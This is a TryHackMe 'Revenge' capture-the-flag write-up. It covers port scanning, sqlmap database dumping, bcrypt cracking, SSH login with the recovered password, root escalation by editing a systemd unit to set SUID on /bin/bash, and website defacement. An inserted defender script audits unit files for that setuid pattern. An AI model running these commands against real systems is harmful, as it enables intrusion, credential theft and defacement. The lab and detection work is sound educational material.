Revenge — TryHackMe — WriteUp
Hello. I’m Rahmos. Here is my Revenge — TryHackMe — WriteUp. Check it out!
First, let’s download Billy’s message.
Well, it looks like he wants me to deface the website! Next up, deploy the machine and run nmap to find open ports.
nmap -A -T4 -p- -v <ip>
There are 2 open ports: 22 (SSH) and 80 (HTTP). First, let’s access the website.
I’ve checked the page source (Ctrl + U), but found nothing valuable. Next, find hidden directories and files using gobuster:
gobuster dir -u http://<ip>:80/ -w /path-to-wordlist
Let’s access /login:
and /admin:
Ok so there are 2 login pages: one for customers and one for the admin. But I haven’t got any credentials yet.
Look at the description:
Ok so I’ll use sqlmap to look for SQLi on this website:
sqlmap -u http://<ip>:80/products/1 --batch --current-db
Note: why /products/1? Because that is where the website loads the products from the database and displays them.
After a while, I’ve got the database name: “duckyinc”. Use the database name to list the tables inside it:
sqlmap -u http://<ip>/products/1 --batch -D duckyinc --tables
And yes, I’ve found 3 tables inside the “duckyinc” database. Let’s dump everything from those 3 tables:
sqlmap -u http://<ip>/products/1 --batch -D duckyinc --dump
Focus on the “user” table and you will see the 1st flag:
Now for the “system_user” table:
I’ve found the server-admin’s credentials. Let’s crack that password hash using john. It’s a bcrypt hash. I will copy the hash to a text file called “server_admin.txt”.
john --wordlist=rockyou.txt server_admin.txt
The password has been cracked! Let’s log in at /admin using the credentials:
server-admin : inuyasha
However, I cannot log in! So what’s this password for? Let’s try SSH:
ssh server-admin@<ip>
Enter the password:
And that’s it! Now I’m into the machine. Find the flag:
Now I’ll find a way to own root to get the 3rd flag. First, run sudo -l to see what server-admin can run with sudo:
Because server-admin can edit the duckyinc.service, I will modify this service to get root:
sudoedit /etc/systemd/system/duckyinc.service
This is the original duckyinc.service.
This is the modified duckyinc.service.
What the modified service does is set the SUID bit on /bin/bash. Save the file and then:
sudo systemctl daemon-reload
sudo systemctl restart duckyinc.service
Then:
/bin/bash -p
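From the defender’s side, the step above leaves two artifacts: a unit file whose Exec* line runs chmod with a setuid mode, and a SUID /bin/bash. The script below is an added example (not part of the original writeup) that audits unit files for that pattern and checks the bit on the binary; since the modified duckyinc.service is shown only as a screenshot, the sample unit in the demo is constructed from the writeup’s description.

```sh
#!/bin/sh
# Added defender-side example, not part of the original writeup: audit systemd
# unit files for the privilege-escalation pattern used above (an Exec* directive
# that sets the SUID bit on a shell). The modified duckyinc.service is shown only
# as a screenshot, so the sample unit below is constructed from its description.

# unit_sets_suid FILE
# Prints the Exec* lines of FILE that run chmod with a setuid mode: symbolic
# (u+s, a+rws, u+x,g+s) or octal with a 4..7 leading digit (4755, 06755).
# Exit status is grep's: 0 if any line matched, 1 if none did.
unit_sets_suid() {
    grep -E '^[[:space:]]*Exec(Start|StartPre|StartPost|Stop|StopPost|Reload)=.*chmod[[:space:]]+(-[A-Za-z]+[[:space:]]+)*([ugoa]*[+][rwxXugo,+]*s|0?[4-7][0-7]{3})([[:space:]]|$)' "$1"
}

# has_suid_bit PATH
# Exit 0 if PATH carries the SUID bit (what /bin/bash looks like after the
# modified service ran), 1 otherwise. -prune keeps find from descending if
# PATH is a directory; -perm -4000 tests the setuid bit.
has_suid_bit() {
    [ -n "$(find "$1" -prune -perm -4000 2>/dev/null)" ]
}

# audit_units FILE...
# Prints "SUSPICIOUS: <file>" for each unit that sets SUID. Exit 0 if every
# unit is clean, 1 if at least one is suspicious.
audit_units() {
    audit_rc=0
    for unit in "$@"; do
        if unit_sets_suid "$unit" >/dev/null; then
            echo "SUSPICIOUS: $unit"
            audit_rc=1
        fi
    done
    return $audit_rc
}

# Stand-alone demo on a constructed unit in a temporary directory.
demo_dir=$(mktemp -d)
cat > "$demo_dir/duckyinc.service" <<'EOF'
[Unit]
Description=constructed sample mirroring the writeup's modified unit
[Service]
ExecStart=/bin/chmod u+s /bin/bash
EOF
if audit_units "$demo_dir/duckyinc.service"; then
    echo "no audited unit sets SUID"
fi
has_suid_bit /bin/bash && echo "WARNING: /bin/bash is SUID"
rm -rf "$demo_dir"
```

Run it against /etc/systemd/system/*.service on a box where sudoedit on a unit file is allowed; a clean audit exits 0.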
Now I’m root! Let’s cd to /root and see what’s inside:
Well there’s no flag here. So I need to deface the website to get the final flag.
First:
cd /var/www/duckyinc/templates
Then edit the “index.html”:
After that, cd to /root and you will see flag3:
The end.
HAPPY HACKING